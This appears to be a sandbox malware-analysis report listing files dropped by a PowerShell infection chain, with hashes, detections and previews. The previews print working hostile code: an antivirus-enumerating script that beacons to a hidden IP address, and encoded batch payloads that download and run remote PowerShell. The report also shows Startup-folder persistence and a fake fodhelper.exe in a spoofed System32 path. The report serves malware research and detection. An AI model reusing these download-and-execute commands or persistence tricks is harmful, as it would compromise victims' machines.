                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\_kjfech8_Vy.lnk

                                                                                                      Download File
                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Icon number=1, Archive, ctime=Sat Oct 26 21:21:46 2024, mtime=Sat Oct 26 21:21:46 2024, atime=Sat Oct 26 21:21:46 2024, length=482, window=hidenormalshowminimized
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1135
                                                                                                      Entropy (8bit):4.66634468229895
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:8ty6aMGuAFyF5TAKfqLDEMBSnvaERLJTvm:817G1Q06qLDvBSiUTv
                                                                                                      MD5:52E5A3D4D4C73848CB1E1096CD2227C9
                                                                                                      SHA1:4586D5AAEDB9479AF92D0EA48DF2CE1E9C8229C3
                                                                                                      SHA-256:4D41C55C24689E58F123CF16408AEF7477BD5549B13E155775FA504A96B020CF
                                                                                                      SHA-512:77E9E4DE111966AB0AB08C18688F9DA0418B697A72A88E2E11E0C887CDE1F2030F13E4EA61E51251355423A0148D54E3EC2FA3460276007ADE891F49F47F8822
                                                                                                      Malicious:false
                                                                                                      Preview:L..................F.... .....q.'....q.'....q.'...............................P.O. .:i.....+00.../C:\...................x.1....."S...Users.d......OwHZY.......u..............:.......8.U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....|.1.....ZY....Public..f......O.IZY......Du..............<......N..P.u.b.l.i.c...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.6.....|.2.....ZY.. .W1064_~2.CMD..`......ZY..ZY.............................N..W.1.0.6.4._.0.3._.k.j.f.e.c.h.8._.V.y...c.m.d.......V...............-.......U............WW>.....C:\Users\Public\computer_kjfech8_Vy.cmd..6.....\.....\.....\.....\.....\.....\.....\.....\.P.u.b.l.i.c.\.W.1.0.6.4._.0.3._.k.j.f.e.c.h.8._.V.y...c.m.d.-.%.P.r.o.g.r.a.m.F.i.l.e.s.%.\.I.n.t.e.r.n.e.t. .E.x.p.l.o.r.e.r.\.i.e.x.p.l.o.r.e...e.x.e.............!............v..*.cM.jVD.Es.!...`.......X.......061544..............n4UB.. .|..ooRb......E.P..#.....n4UB.. .|..ooRb......E.P..#.............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.4.2.5.3.1.

                                                                                                      C:\Users\Public\201024

                                                                                                      Download File
                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):26
                                                                                                      Entropy (8bit):2.968918563962097
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3:Q665AyXpn:Q64ACpn
                                                                                                      MD5:BE0D37AD6237FD8EA3C01C06C1CCF52A
                                                                                                      SHA1:E42CF8B5459C5AB4F6A2E3BF1849D817EB148829
                                                                                                      SHA-256:F5F443E1F6CFAA8A9D23324F8EAA986D3C34370136B3781704A87FF76C2B2B95
                                                                                                      SHA-512:E673FD497F86145D28ED2AD3CCEB0CE2651BD31BCE8329C6DA43835A3EC8F1493E670033FA050B114CF89CB70E352B99FE0BE310E24D78811895F02C4B05E328
                                                                                                      Malicious:false
                                                                                                      Preview:.._.k.j.f.e.c.h.8._.V.....

                                                                                                      C:\Users\Public\Documents\vs1.ps1

                                                                                                      Download File
                                                                                                      Process:C:\Windows\System32\curl.exe
                                                                                                      File Type:awk or perl script, ASCII text, with very long lines (456), with CRLF line terminators
                                                                                                      Category:modified
                                                                                                      Size (bytes):26455
                                                                                                      Entropy (8bit):5.059985897734625
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:768:GNiNrnhcaZWyW+ud7/r6jbw8GlftuLGuIwUcLMV8GGGMrGMbGb7Y4X5uGLMVadRq:A8rnhcaZWyW+ud7/r6jbw8GlftuLGuIm
                                                                                                      MD5:67F4511BB417F6CF9A57B2B3D09E9BDF
                                                                                                      SHA1:D15346D2BB0FF8C04DFB8BA2DE64778CA1480638
                                                                                                      SHA-256:D91DA055F8BE70FEF8B7E5B11849038C7E5BC8161ADC45691B95DED71F59819A
                                                                                                      SHA-512:DEF411D1F1523E20CF9BA5610AA17191163902732E23ED6E368912DCED5CB493AFA7F9CFE5B38A67D4E865A635BF448F740629F3F2A30B630FC12424CF8F9AD9
                                                                                                      Malicious:true
                                                                                                      Yara Hits:
                                                                                                      • Rule: JoeSecurity_PowershellDownloadAndExecute, Description: Yara detected Powershell download and execute, Source: C:\Users\Public\Documents\vs1.ps1, Author: Joe Security
                                                                                                      Antivirus:
                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                      Preview:function ____///////// { ..[cmdletBinding()] ..param ( ..[string]$ComputerName = "$env:computername" , ..$Credential ..) .. BEGIN .. { .. $wmiQuery = "SELECT * FROM AntiVirusProduct" .. } .. PROCESS .. { $AntivirusProduct = Get-WmiObject -Namespace "root\SecurityCenter2" -Query $wmiQuery @psboundparameters .. $AntivirusNames = $AntivirusProduct.displayName .. $lang = Get-Culture .. $lang = $lang.displayname.. .. $winds = (Get-WmiObject -class Win32_OperatingSystem).Caption.. if($env:PROCESSOR_ARCHITECTURE -eq "x86"){ $Bits =" 32-Bit CPU "}Else{ $Bits =" 64-Bit CPU "}.... $WebRequest = [System.Net.WebRequest]::Create(([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('aAB0AHQAcAA6AC8ALwA2ADIALgA3ADIALgAzAC4AMgAxADAALwBsAGQAaAB0AC8AaQBuAGQAZQB4AC4AcABoAHAA')))) ..

                                                                                                      C:\Users\Public\computer_kjfech8_V.cmd

                                                                                                      Download File
                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):481
                                                                                                      Entropy (8bit):5.355948864392777
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12:/IUb4u4tmm2scxuQpN+6LO5Sfy8n6fpArZrf7Xrfz+WB:wztosZ0N+6uS68n6crzrL1B
                                                                                                      MD5:CCE2A45859A6B85674883CB540E273ED
                                                                                                      SHA1:F6B6D6448338D6C78E9FF87CBAF6639D4B9D5AE6
                                                                                                      SHA-256:50B1323F0CE2221D4837C7BBF38C894B44CBA5D6532DCAE672AAAE3164E6FC8E
                                                                                                      SHA-512:6B4B30FE6B8ECE46D918111F84A3694B5F1D476A7F85C15AFC38FD269BD2930B99D2DF1C2AB699047B1E269621BDFDA1D5013756409394918C2492EF39849E94
                                                                                                      Malicious:true
                                                                                                      Antivirus:
                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                      Preview:@Echo off..Setlocal EnableExtensions..Setlocal EnableDelayedExpansion..cd %SystemRoot%\System32..Set /P _kjfech8_V=<"C:\_kjfech8_V\computer_kjfech8_V"..set chars=0123456789abcdefghijklmnopqrstuvwxyz..for /L %%N in (10 1 36) do (..for /F %%C in ("!chars:~%%N,1!") do (..set "_kjfech8_V=!_kjfech8_V:%%N=%%C!"..)..)..)..for /F %%F in ("!_kjfech8_V!") do (..set "_kjfech8_V=!_kjfech8_V:@=!"..)..for /F %%F in ("!_kjfech8_V!") do (..set "_kjfech8_V=!_kjfech8_V:"=!"..)..%_kjfech8_V%....

                                                                                                      C:\Users\Public\computer_kjfech8_Vy.cmd

                                                                                                      Download File
                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):482
                                                                                                      Entropy (8bit):5.358829564456304
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12:/IUb4u4tmm2scxuHN+6LO5Sfy8n6fpArZrf7Xrfz+WB:wztosZHN+6uS68n6crzrL1B
                                                                                                      MD5:D4050C848880A5CDD470742763B263AA
                                                                                                      SHA1:D5160D10B3F33BC541E193C19B2AF2131501E7E3
                                                                                                      SHA-256:4D914E0459F1D9C471BCC0144CF1669DAC1B014EFAADB60068D8CAADB31A0C0C
                                                                                                      SHA-512:DCD1CC9869BBF28862B1358C8E034C5DA8219E579DDA7680FEE7562A56E8A515CA3ACDA5905BD471F46CE044BBAA5B8E5444FD4CF90EBF8DFDAF90A34000B046
                                                                                                      Malicious:true
                                                                                                      Antivirus:
                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                      Preview:@Echo off..Setlocal EnableExtensions..Setlocal EnableDelayedExpansion..cd %SystemRoot%\System32..Set /P _kjfech8_V=<"C:\_kjfech8_V\computer_kjfech8_Vy"..set chars=0123456789abcdefghijklmnopqrstuvwxyz..for /L %%N in (10 1 36) do (..for /F %%C in ("!chars:~%%N,1!") do (..set "_kjfech8_V=!_kjfech8_V:%%N=%%C!"..)..)..)..for /F %%F in ("!_kjfech8_V!") do (..set "_kjfech8_V=!_kjfech8_V:@=!"..)..for /F %%F in ("!_kjfech8_V!") do (..set "_kjfech8_V=!_kjfech8_V:"=!"..)..%_kjfech8_V%....

                                                                                                      C:\Windows \System32\fodhelper.exe

                                                                                                      Download File
                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                      Category:dropped
                                                                                                      Size (bytes):49664
                                                                                                      Entropy (8bit):5.876977574715819
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:768:WwU7bDT2KLt6oPjQQ5fxGIjN44MgZkD9TpiPogpUORaNpohsySZlv7:WtfT2KwoPBxjN4zDbgpUOoo1SZ17
                                                                                                      MD5:85018BE1FD913656BC9FF541F017EACD
                                                                                                      SHA1:26D7407931B713E0F0FA8B872FEECDB3CF49065A
                                                                                                      SHA-256:C546E05D705FFDD5E1E18D40E2E7397F186A7C47FA5FC21F234222D057227CF5
                                                                                                      SHA-512:3E5903CF18386951C015AE23DD68A112B2F4B0968212323218C49F8413B6D508283CC6AAA929DBEAD853BD100ADC18BF497479963DAD42DFAFBEB081C9035459
                                                                                                      Malicious:false
                                                                                                      Antivirus:
                                                                                                      • Antivirus: ReversingLabs, Detection: 3%
                                                                                                      Joe Sandbox View:
                                                                                                      • Filename: rPO767575.cmd, Detection: malicious, Browse
                                                                                                      • Filename: KKKK.hta, Detection: malicious, Browse
                                                                                                      • Filename: ZG7UaFRPVW.exe, Detection: malicious, Browse
                                                                                                      • Filename: IN-34823_PO39276-pdf.vbe, Detection: malicious, Browse
                                                                                                      • Filename: 7XU2cRFInT.exe, Detection: malicious, Browse
                                                                                                      • Filename: megerosites.cmd, Detection: malicious, Browse
                                                                                                      • Filename: Scan_SKMBT_EPDA _ SOA_Payment Reference TR-37827392-2024-07-24.Pdf.exe, Detection: malicious, Browse
                                                                                                      • Filename: Payroll for July.exe, Detection: malicious, Browse
                                                                                                      • Filename: 2nd_Quarter_Order_Sheet_xls_0000000000000000000.exe, Detection: malicious, Browse
                                                                                                      • Filename: Import_Tax Invoice_PL_xls_0000000000000000000 .exe, Detection: malicious, Browse
                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......y.-.=.C.=.C.=.C.4...#.C.).F.<.C.).@.?.C.).G.).C.).B.6.C.=.B.O.C.).K.;.C.)..<.C.).A.<.C.Rich=.C.........................PE..d....*}..........."..........D......`..........@............................. ....................... ..........................................h...............X.......................T........................... ...............8................................text.............................. ..`.imrsiv..................................rdata..2&.......(..................@..@.data...............................@....pdata..X...........................@..@.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................

                                                                                                      C:\_kjfech8_V\6.txt

                                                                                                      Download File
                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):68330000
                                                                                                      Entropy (8bit):7.999997201173071
                                                                                                      Encrypted:true
                                                                                                      SSDEEP:1572864:EQ27uOe3TzkFTMFcREDv91nY27fqMtQxMCj7920jg9pjUGpDn:hrjoFTMaWTfnjfJYt9C9JDn
                                                                                                      MD5:3AD4359325A5C5D2A33BD7D902A80075
                                                                                                      SHA1:63AA60AC67D9927C25535E967FA9D87549183F89
                                                                                                      SHA-256:1C36B918769F3C9F026D0BE59263DD16CDEDC639CCE24092AEF67A6E36D19CF8
                                                                                                      SHA-512:E33DFB7EE833D75E9DFFB8D02CD5ABBB2403553E50C5756890AE6495F89C43763850DA040F8DF6F95901E233BC5BB3ACB1BBA6655B54A9A7ADED7BBE0D7163D4
                                                                                                      Malicious:false
                                                                                                      Preview:...}/C~.Qz..^.i.a.2.(..'....-..#.$..8..[.Q......xD.P.5..Y....)7Rr..48i....u.sN.-,:...h#.|..D..V.u...$g......%....r...V..H.-....hHpZ.:.........~......x.9AN.Q%..$..E...{#.O...\...)..OE...J.NF....B.[.-@...<.d.4<j..).{.AP..b`.1&..fB.L.K...W..Eeo...>....e.}.r.>..2...........$.@.n..'.!E.. .AY.#...-I.=,..]..x...ifI.3<...T.k..l.0+_d\<.H...v......\.{.....VX......5......-6O....~.wM...i.o..../.r.?...../".<...4...D......{......2z*...ee/7B..m........-....G.](.{.#?It....A...,P...~...".D..3..?..T....[..TI!..~L,f..q..5.../\dtK.}p...J......Rp0...DB.......d.[. .3..F.F64&4....`.fPfp.O.p...4m...)9"O.p.Z.n..h..kx...".k.h.^.2......=..@.E..Wy.s.."ke.bx......(4...'/...%...'......o.vO._...I..(Z.l......).;....(.].........S.q...Ji...........M*._2..s2S..<..'..%#'...}........x.k.*.L.......R..'.}..."..C'{.}.m......\B....E....R.~..-"..*..^.B...........G.cQo.u3.......-L]..U.d..uU....$/4!.....W...oz...S4.W..<....M.c:........-...w.n.....V(j...l.ra.6I..,.g,.."#.

                                                                                                      C:\_kjfech8_V\MSVCR100.dll (copy)

                                                                                                      Download File
                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                      Category:dropped
                                                                                                      Size (bytes):773968
                                                                                                      Entropy (8bit):6.901569696995594
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12288:yMmCy3nAgPAxN9ueqix/HEmxsvGrif8ZSy+rdQw2QRAtd74/vmYK6H3BV0eAI:dmCy3KxW3ixPEmxsvGrm8Z6r+JQPzV4I
                                                                                                      MD5:BF38660A9125935658CFA3E53FDC7D65
                                                                                                      SHA1:0B51FB415EC89848F339F8989D323BEA722BFD70
                                                                                                      SHA-256:60C06E0FA4449314DA3A0A87C1A9D9577DF99226F943637E06F61188E5862EFA
                                                                                                      SHA-512:25F521FFE25A950D0F1A4DE63B04CB62E2A3B0E72E7405799586913208BF8F8FA52AA34E96A9CC6EE47AFCD41870F3AA0CD8289C53461D1B6E792D19B750C9A1
                                                                                                      Malicious:false
                                                                                                      Antivirus:
                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                      Joe Sandbox View:
                                                                                                      • Filename: mXF65oa1GJ.exe, Detection: malicious, Browse
                                                                                                      • Filename: mXF65oa1GJ.exe, Detection: malicious, Browse
                                                                                                      • Filename: Confirm Me.exe, Detection: malicious, Browse
                                                                                                      • Filename: PInstaller.exe, Detection: malicious, Browse
                                                                                                      • Filename: 123.sfx.exe, Detection: malicious, Browse
                                                                                                      • Filename: KKKK.hta, Detection: malicious, Browse
                                                                                                      • Filename: formatfactory-4-6-1-0.exe, Detection: malicious, Browse
                                                                                                      • Filename: formatfactory-4-6-1-0.exe, Detection: malicious, Browse
                                                                                                      • Filename: EYOFFTITMDLXZJFFCCGFDTBIY.msi, Detection: malicious, Browse
                                                                                                      • Filename: SSCBOLGZFXVJMEICRNQMJOCDIF.msi, Detection: malicious, Browse
                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......:.y.~...~...~...w...}...~.......eD.....eD..+...eD..J...eD......eD......eD......eD......Rich~...................PE..L..."._M.........."!.........................0.....x................................u.....@..........................H......d...(.......................P.......$L...!..8...........................hE..@............................................text...!........................... ..`.data....Z...0...N..................@....rsrc................f..............@..@.reloc..$L.......N...j..............@..B................................................................................................................................................................................................................................................................................................................................................................

                                                                                                      C:\_kjfech8_V\MSVCR100.txt

                                                                                                      Download File
                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                      Category:dropped
                                                                                                      Size (bytes):773968
                                                                                                      Entropy (8bit):6.901569696995594
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12288:yMmCy3nAgPAxN9ueqix/HEmxsvGrif8ZSy+rdQw2QRAtd74/vmYK6H3BV0eAI:dmCy3KxW3ixPEmxsvGrm8Z6r+JQPzV4I
                                                                                                      MD5:BF38660A9125935658CFA3E53FDC7D65
                                                                                                      SHA1:0B51FB415EC89848F339F8989D323BEA722BFD70
                                                                                                      SHA-256:60C06E0FA4449314DA3A0A87C1A9D9577DF99226F943637E06F61188E5862EFA
                                                                                                      SHA-512:25F521FFE25A950D0F1A4DE63B04CB62E2A3B0E72E7405799586913208BF8F8FA52AA34E96A9CC6EE47AFCD41870F3AA0CD8289C53461D1B6E792D19B750C9A1
                                                                                                      Malicious:false
                                                                                                      Antivirus:
                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......:.y.~...~...~...w...}...~.......eD.....eD..+...eD..J...eD......eD......eD......eD......Rich~...................PE..L..."._M.........."!.........................0.....x................................u.....@..........................H......d...(.......................P.......$L...!..8...........................hE..@............................................text...!........................... ..`.data....Z...0...N..................@....rsrc................f..............@..@.reloc..$L.......N...j..............@..B................................................................................................................................................................................................................................................................................................................................................................

                                                                                                      C:\_kjfech8_V\computer_kjfech8_V

                                                                                                      Download File
                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):293
                                                                                                      Entropy (8bit):3.3219880145434697
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:6:fRnNiTwFOhT6WVhEqnXcx91PNWlDxUWP8uIl8OH/DlBMn:5nNis+hFnXoYldUPtXon
                                                                                                      MD5:F33BB3F1B71C05FC8DAA3B0908BE3DCA
                                                                                                      SHA1:933329E5A139ABB5465A9606DC70EEB3B8D09773
                                                                                                      SHA-256:EBDA232FC01D4837B77EC30597945B103B45245714A6FE6AFE0D198010F21195
                                                                                                      SHA-512:37F92A7C3D6F230FFCFE63E79D5FA4B1394B246FDCAAAB2341926A2D36C4B0EFD28EE1123E6D194EBA021EDE5ACD76ADC825C345EE17CBA3B2F542FF4142CCC0
                                                                                                      Malicious:false
                                                                                                      Preview:@14@12@17@24 @18@14@33 (@23@14@32-@24@11@19@14@12@29 @23@14@29.@32@14@11@12@21@18@14@23@29).@13@24@32@23@21@24@10@13@28@29@27@18@23@16('@17@29@29@25@28://@15@28@23@10@29.@28@17@24@25/@10/@0@8/@1@5@0@8@2@2/@30@25/@30@25') | @25@24@32@14@27@28@17@14@21@21.@14@33@14 -@23@24@25 -@32@18@23 @1 -..

                                                                                                      C:\_kjfech8_V\computer_kjfech8_Vy

                                                                                                      Download File
                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):293
                                                                                                      Entropy (8bit):3.3222176487027815
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:6:fRnNiTwFOhT6WVhEqnXcx91PNWlDxUWP82eZFl8OH/DlBMn:5nNis+hFnXoYldUP2eZhon
                                                                                                      MD5:9C2D3D09140EEEB2EFE40F876D44E1B0
                                                                                                      SHA1:D025BF465CB917BA91D8F4AF601E7AB5A0DC5103
                                                                                                      SHA-256:72B3480265246FB30775BD6C6DF814C48D07FF8A2AF3CD3BB28AC61119D88734
                                                                                                      SHA-512:7480FFCBF90D81DD1F195068F4A00E7CB96A6BB965F79519C31ED2B295011B277111DB74E6D153CAAD6D08AFF7ED3311D59D6BD5C2A670317F8F364531623C0F
                                                                                                      Malicious:false
                                                                                                      Preview:@14@12@17@24 @18@14@33 (@23@14@32-@24@11@19@14@12@29 @23@14@29.@32@14@11@12@21@18@14@23@29).@13@24@32@23@21@24@10@13@28@29@27@18@23@16('@17@29@29@25@28://@15@28@23@10@29.@28@17@24@25/@10/@0@8/@1@5@0@8@2@2/@10@30/@10@30') | @25@24@32@14@27@28@17@14@21@21.@14@33@14 -@23@24@25 -@32@18@23 @1 -..

                                                                                                      C:\_kjfech8_V\WebView2Loader.dll (copy)

                                                                                                      Download File
                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                      Category:dropped
                                                                                                      Size (bytes):108448
                                                                                                      Entropy (8bit):6.4314522815075446
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3072:iTC3F6JkULenwAFqz5pV3+Zqocv0T+EtO5pf+gMl/1:iuV66kL5pjxEtqpWRl/1
                                                                                                      MD5:61E6B94AB6109254FBEF360681F5B80D
                                                                                                      SHA1:204A5EDA5FEA33A56EDB33B9CCD40AF635A04564
                                                                                                      SHA-256:446B4D19ED8FA1563B77A7F36261B76911B208AF1D00A805D54E44B01CA3F54A
                                                                                                      SHA-512:93FAD29F13C0A18E4864DDF57AEBA882FB411B84F6DFF993B87295A1B5E4B488433802C2150FBF25A3132379DC2EB3AA02D836059B0EF24A2DB4269EB0795A9B
                                                                                                      Malicious:false
                                                                                                      Antivirus:
                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                      Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L......a.........."!.................8...............................................0....@A.........................].......^..(........................#......L...X[.......................Y......`...............X`..<....\..`....................text...G........................... ..`.rdata..Lm.......n..................@..@.data........p.......\..............@....00cfg...............f..............@..@.tls.................h..............@....voltbl.H............j...................rsrc................l..............@..@.reloc..L............r..............@..B........................................................................................................................................................................................................................................................................................................................

                                                                                                      C:\_kjfech8_V\WebView2Loader.txt

                                                                                                      Download File
                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                      Category:dropped
                                                                                                      Size (bytes):108448
                                                                                                      Entropy (8bit):6.4314522815075446
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3072:iTC3F6JkULenwAFqz5pV3+Zqocv0T+EtO5pf+gMl/1:iuV66kL5pjxEtqpWRl/1
                                                                                                      MD5:61E6B94AB6109254FBEF360681F5B80D
                                                                                                      SHA1:204A5EDA5FEA33A56EDB33B9CCD40AF635A04564
                                                                                                      SHA-256:446B4D19ED8FA1563B77A7F36261B76911B208AF1D00A805D54E44B01CA3F54A
                                                                                                      SHA-512:93FAD29F13C0A18E4864DDF57AEBA882FB411B84F6DFF993B87295A1B5E4B488433802C2150FBF25A3132379DC2EB3AA02D836059B0EF24A2DB4269EB0795A9B
                                                                                                      Malicious:false
                                                                                                      Antivirus:
                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                      Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L......a.........."!.................8...............................................0....@A.........................].......^..(........................#......L...X[.......................Y......`...............X`..<....\..`....................text...G........................... ..`.rdata..Lm.......n..................@..@.data........p.......\..............@....00cfg...............f..............@..@.tls.................h..............@....voltbl.H............j...................rsrc................l..............@..@.reloc..L............r..............@..B........................................................................................................................................................................................................................................................................................................................

                                                                                                      C:\_kjfech8_V\_kjfech8_V._kjfech8_V

                                                                                                      Download File
                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                      Category:dropped
                                                                                                      Size (bytes):72830057
                                                                                                      Entropy (8bit):7.999970220702098
                                                                                                      Encrypted:true
                                                                                                      SSDEEP:1572864:Rl30xbxfZOMP+N1p1rYU3SXYp9tzd3HToEXq0Jv:rkxbBZOQ6v1rYEVnhbtJv
                                                                                                      MD5:E72F7F139A00045E7A2DAF8A1C0AB730
                                                                                                      SHA1:8F1D21A21EAF6A4E312E2D15CFE4115CD9BE5AFD
                                                                                                      SHA-256:78EBE0FF32A280E98E6720E60FC1E95FBD533C3F4535D41CF790C87125556F8E
                                                                                                      SHA-512:AD31A82D34FE2604099090952ABB33DB7F9370A161227CAF1CC7C28E5083F15D5F8EEF24CF77251BCC846A43DC50D6271B29DAE83297E4147DD5DB41B44B5B65
                                                                                                      Malicious:false
                                                                                                      Preview:PK........oNSY............. .jli.txtUT...R..g. .g.{.fux...............|.E.0.3.I:.!3. .#......TB..y`x.....F.1..d'..]..v.4.Y...^..W.^w.....u'.L.....AX..j.Q..!.H..T.LfB|......LU.:.:Uu....n......9..9+.i...c.vn......{...N.......K.>......!..Uw..|}.z.AL..2.%.&I.......i7.1'.......qK.1\.......q.1..D....{..R.\.q6.M..:4....i.).c'....9.aX.M...).......@:0...+h.........W....=...p.X./.%V6..V....*.w./...U...;..N"..W].WQ..C~g.B.F.|...V......95.u..S.3..1....q7Cz....U0DZG.+..i.(x....9.v.....g..^..Rt....*k..rz....A..exY.\.....m.h....W......h[.......?.f.LQYuu5..../.F,(.i..]Red...b.z4.l(1..k.....].......h..&..tx...BQU.K\X+rM..m......55Pf..._cY..+.ta..Fn7......p.=....U.._.2..]...5..L.h..g...u. ..1N...E..[g.VB.....s.<.$....(..Pn../..7T.R...'b...!.Pm...,........5>...b%...#......I..T.........&Z....\.........../.].......@C.`."n.X._^]Q..%..L....9...M.N..5.....m.........../.....&..u..A....Z....c.vQ...0....`.g.f.*-wU.cw..q.l^VS9.....ov,.n...6:..!..."..k...vNa..q

                                                                                                      C:\_kjfech8_V\_kjfech8_V.ai (copy)

                                                                                                      Download File
                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):24278
                                                                                                      Entropy (8bit):7.992239472488486
                                                                                                      Encrypted:true
                                                                                                      SSDEEP:384:MZ/cBozUqKi8DsHqjFnKNSTYY0Rez/5QLkWN6vXiAq+7UYaiaeOaIfxVh+bJ/jIW:6/vUqKFsKw0h1QL7Qvy8UYP6aIfxVgbz
                                                                                                      MD5:36B4C39FF2982F0A7D3DEDC71839AFA7
                                                                                                      SHA1:ABE9615811A42C68368C6472E520CC0AFDB74E02
                                                                                                      SHA-256:F189601651275217ACFC20A19E1D27D2AD2F9687BFD05E2D7C760EC749E93F17
                                                                                                      SHA-512:CDDD0EB6EA3F639C5853BAB86F852D1F9AC2B91053380D1F732693E12A96ED1F662833DD48993A13F11DF9809552E7F1097090CE1ADF633E8E1A3D668418C506
                                                                                                      Malicious:false
                                                                                                      Preview:.HK..lJ..LS...H}AU3!EA06M..s$.<.z..g....kC.R.....:!.)......@...F..k;!..u:.=..3............d.a.M....,p~.=.....C.9..8..._yr.0x.y...&I..O.L4s.m.1..((..b...^......=...6..q.J.%>f..?3}.I..F..t..^..V...:.P8"..:................ "..0.Lw "..0.LwkC.R......%x....}...q..U-...(....%....V..?p.h.........?.o..T..[..f.w..$ D...$.6..*D.w....x.U..&..m.....n...U.S*...'....Y.E...,../......:^;.5.g5.....z......UH..\ .......B...... "..m.Iw "....Kwm........v..5...x...(.U?j....$.1.#.~.\........i...}.k..,..7.)X...0..=...a.o9'../>1...`E..l...M.`.#gp..x.u.. ....6Z....4{Q.k'....{.U5.A....a..)...=..>3.2p.c[.....h..........-.fC.~........E.+.....O..1L..A........=]-..0.@.=....6W.`&o.%.....|.aG..bJ...)..2............yJQ.i%5...(.O!.1.I.Q.....=.bs...3.2..k......H.|N.C:..G..V.EK.H?.......[...".c..@S[.......'ms#...@.A%...::..c..p.e(....X..{...H../.+..b#.0.`r ..[w.X..9.......8..OF..-.:...'.1.s'.%V.&7..8w..o..t.].S..WG........~a8..mYX9..X.Yu/..L4t.H.D....J..~S....j;....

                                                                                                      C:\_kjfech8_V\_kjfech8_V.at (copy)

                                                                                                      Download File
                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):24286
                                                                                                      Entropy (8bit):7.992282333476335
                                                                                                      Encrypted:true
                                                                                                      SSDEEP:384:MT8/cBozUqKi8DsHqjFnKNSTYY0Rez/5QLkWN6vXiAq+7UYaiaeOaIfxVh+bJ/jW:e8/vUqKFsKw0h1QL7Qvy8UYP6aIfxVgs
                                                                                                      MD5:2F200A8033EB6129E54D5FA818A64A21
                                                                                                      SHA1:68B6D29FF5CA9B4044B130AF7FF4F8FFC7703044
                                                                                                      SHA-256:F7BAA214EC4B2B4B05ABA4AD2CB96B04EB090E8DF9D53FC395B4636661928A25
                                                                                                      SHA-512:9A1A4B444EDAE236EDCF26C2544D9A83F544D0D8F53CFD21A12132D80F0D6D18ACE5B76D907B5FD672412C5B954DF4A738A748D600EDCC0D13B2307AE3FCDA1F
                                                                                                      Malicious:false
